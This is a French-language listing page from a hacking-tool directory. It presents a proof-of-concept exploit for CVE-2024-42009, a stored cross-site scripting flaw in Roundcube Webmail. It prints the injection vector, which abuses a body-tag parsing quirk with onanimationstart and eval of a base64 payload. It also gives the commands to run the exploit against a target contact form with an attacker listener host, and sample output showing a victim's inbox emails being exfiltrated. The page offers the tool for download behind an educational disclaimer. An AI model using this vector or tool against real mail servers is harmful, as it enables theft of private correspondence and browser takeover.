Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 Proof of Concept | Kitploit
Outils/GitHubGitHub/danithehack3r/cve-2024-42009-poc
Phishing ToolsExploitationWeb Application ExploitationData ExfiltrationLearning & EducationEmail Security
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 Proof of Concept

Voir le dépôt
71il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-42009 PoC: Capture d'emails et exploitation XSS dans Roundcube Webmail

Présentation

Ce dépôt contient une preuve de concept (PoC) d'exploit pour CVE-2024-42009, une vulnérabilité de Cross-Site Scripting (XSS) stockée dans Roundcube Webmail version 1.6.7 et plusieurs autres versions. L'exploit montre comment un attaquant peut injecter du JavaScript malveillant dans un message et profiter d'un problème de désanitisation lors de l'analyse du HTML dans le message, ce qui peut ensuite être utilisé pour exfiltrer le contenu des emails de la boîte de réception de la victime dans cet exemple, voire prendre le contrôle du navigateur de la victime.

Détails de la vulnérabilité

Description du CVE

Une vulnérabilité Cross-Site Scripting dans Roundcube jusqu'à la version 1.5.7 et 1.6.x jusqu'à 1.6.7 permet à un attaquant distant de voler et d'envoyer des emails d'une victime via un message électronique contrefait qui abuse d'un problème de désanitisation dans message_body() dans program/actions/mail/show.php.

Explication de la charge utile XSS (pour cet exemple)

L'exploit utilise un déclencheur d'animation CSS pour l'exécution XSS :

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

Le body est analysé comme une div, et nous devons nous y adapter, c'est pourquoi nous utilisons l'attribut onanimationstart pour appeler la fonction eval et exécuter des appels JavaScript complexes. Pour en savoir plus sur le fonctionnement de l'exploit et sur l'emplacement des vulnérabilités dans Roundcube, lisez cet article.

Portée

  • Cet exploit a été testé uniquement sur Roundcube Webmail version 1.6.7
  • La victime doit ouvrir le message pour voir son contenu
  • Peut échouer si la politique de sécurité du contenu (CSP) est correctement configurée

Utilisation

Dépendances

Installez les paquets Python requis :

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

Arguments en ligne de commande

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • URL cible : Dans ce cas, nous utilisons le point d'accès du formulaire de contact qui gère les messages et les transmet (par ex., http://email.company.local/contact)
  • Email du destinataire : Adresse email valide qui recevra le message malveillant
  • Hôte listener : Adresse IP de votre machine accessible depuis la cible
  • Port listener : Port disponible pour le serveur HTTP (par ex., 4444)

Exemple d'utilisation

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

Résultat attendu

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

Références

Recherche sur la vulnérabilité

  • SonarSource Blog: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail
  • Vidéo de démonstration de SonarSource

Avertissement légal

⚠️ IMPORTANT : Cette preuve de concept est fournie uniquement à des fins éducatives et de tests autorisés. Utilisez-la de manière responsable et ce compte n'est pas responsable des dommages causés par autrui.

Télécharger l’outil